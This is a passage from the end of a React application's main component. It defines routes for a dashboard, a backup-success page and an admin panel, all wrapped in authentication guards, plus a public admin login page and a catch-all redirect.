        <Route path="/dashboard" element={
          <ProtectedRoute>
            <Dashboard />
          </ProtectedRoute>
        } />
        <Route path="/backup-success" element={
          <ProtectedRoute>
            <BackupSuccess />
          </ProtectedRoute>
        } />
        
        {/* Admin Routes */}
        <Route path="/admin/login" element={<AdminLogin />} />
        <Route path="/admin" element={
          <ProtectedRoute requireAdmin>
            <AdminPanel />
          </ProtectedRoute>
        } />
        
        {/* Catch all */}
        <Route path="*" element={<Navigate to="/" replace />} />
      </Routes>
    </AuthProvider>
  );
}

export default App;

